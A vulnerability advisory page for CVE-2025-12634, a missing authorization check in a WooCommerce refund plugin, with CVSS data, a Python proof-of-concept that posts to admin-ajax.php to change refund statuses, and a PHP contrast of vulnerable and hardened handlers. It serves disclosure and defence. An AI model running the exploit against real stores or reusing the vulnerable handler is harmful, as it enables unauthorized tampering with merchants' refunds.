Security Vulnerability Report
CVE-2025-12634 CVSS 4.3 MEDIUM

CVE-2025-12634

Published: 2025-11-25 08:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Refund Request for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_refund_status' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update refund statuses to approved or rejected.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this entry; the affected product is taken from the description:

Refund Request for WooCommerce plugin for WordPress, all versions <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12634 PoC - Refund Request for WooCommerce Unauthorized Status Update
# Authentication Required: Subscriber-level or higher
#
# NOTE: the advisory only names the vulnerable function ('update_refund_status').
# The AJAX action name and the 'refund_id', 'status' and '_wpnonce' parameter
# names used below are assumptions and must be verified against the plugin
# source before relying on this script.
import sys

import requests

TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php"
COOKIES = {
    "wordpress_test_cookie": "WP+Cookie+check",
    "wordpress_logged_in_[hash]": "your_auth_cookie",
}


def update_refund_status(refund_id, new_status, nonce):
    """Update a refund status; the plugin applies no capability check.

    Args:
        refund_id: ID of the refund request to modify
        new_status: 'approved' or 'rejected'
        nonce: WordPress nonce for the request
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": TARGET_URL.replace("/admin-ajax.php", "/wp-admin/admin.php"),
    }
    data = {
        "action": "update_refund_status",  # Vulnerable action
        "refund_id": refund_id,
        "status": new_status,
        "_wpnonce": nonce,
    }
    response = requests.post(
        TARGET_URL, data=data, cookies=COOKIES, headers=headers, timeout=15
    )
    # admin-ajax.php answers with a bare '0' or '-1' (not JSON) for an unknown
    # action or a failed nonce check, so do not assume a JSON body.
    try:
        return response.json()
    except ValueError:
        return {
            "success": False,
            "status_code": response.status_code,
            "body": response.text[:200],
        }


def main():
    if len(sys.argv) < 4:
        print("Usage: python poc.py <refund_id> <status> <nonce>")
        print("Example: python poc.py 123 approved abc123")
        sys.exit(1)

    refund_id = sys.argv[1]
    status = sys.argv[2]  # 'approved' or 'rejected'
    nonce = sys.argv[3]

    result = update_refund_status(refund_id, status, nonce)
    print(f"Response: {result}")
    if result.get("success"):
        print(f"[!] Successfully updated refund {refund_id} to {status}")
    else:
        print("[*] Request failed or returned error")


if __name__ == "__main__":
    main()
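The weakness behind this CVE (CWE-862, a missing authorization check on an admin-ajax handler) in vulnerable and hardened form. This is an added illustration, not code from the Refund Request for WooCommerce plugin: the hook name, function and meta-key names, the nonce action string and the choice of the manage_woocommerce capability are assumptions made for the example.

```php
<?php
// Added illustration of the CWE-862 pattern, not the plugin's own code.
// Hook, function and meta-key names and the capability chosen are assumptions.

// --- Vulnerable shape (shown unhooked). wp_ajax_* hooks fire for every
// logged-in user, Subscribers included; nothing here asks who the caller is.
// It would be registered as:
//   add_action( 'wp_ajax_update_refund_status', 'rrwc_update_refund_status_vulnerable' );
function rrwc_update_refund_status_vulnerable() {
    $refund_id = absint( $_POST['refund_id'] ?? 0 );
    $status    = sanitize_text_field( wp_unslash( $_POST['status'] ?? '' ) );
    update_post_meta( $refund_id, '_refund_status', $status ); // assumed storage
    wp_send_json_success( array( 'refund_id' => $refund_id, 'status' => $status ) );
}

// --- Hardened: CSRF nonce + capability check + input allow-list.
add_action( 'wp_ajax_update_refund_status', 'rrwc_update_refund_status_hardened' );
function rrwc_update_refund_status_hardened() {
    // 1. CSRF: check_ajax_referer() terminates the request on a bad/missing nonce.
    check_ajax_referer( 'rrwc_update_refund_status', '_wpnonce' );

    // 2. Authorization: the check the advisory reports as missing.
    //    manage_woocommerce is granted to Shop Managers and Administrators,
    //    not to Subscribers. wp_send_json_error() calls wp_die(), so the
    //    function does not continue past it.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Input validation: only the two states the feature defines.
    $refund_id = absint( $_POST['refund_id'] ?? 0 );
    $status    = sanitize_text_field( wp_unslash( $_POST['status'] ?? '' ) );
    if ( ! $refund_id || ! in_array( $status, array( 'approved', 'rejected' ), true ) ) {
        wp_send_json_error( array( 'message' => 'invalid request' ), 400 );
    }

    update_post_meta( $refund_id, '_refund_status', $status ); // assumed storage
    wp_send_json_success( array( 'refund_id' => $refund_id, 'status' => $status ) );
}
```

The nonce is not a substitute for the capability check: any logged-in user who can load a page that embeds the nonce can replay it, which is exactly the Subscriber-level access the advisory describes. The page lists no fixed version; until one is confirmed, treat every install at 1.0 or earlier as affected.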

References

https://wordpress.org/plugins/refund-request-for-woocommerce/
https://www.wordfence.com/threat-intel/vulnerabilities/id/f15b4596-8e00-4e66-8b51-f49ede1ff307?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12634", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:49.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Refund Request for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_refund_status' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update refund statuses to approved or rejected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/refund-request-for-woocommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f15b4596-8e00-4e66-8b51-f49ede1ff307?source=cve", "source": "[email protected]"}]}}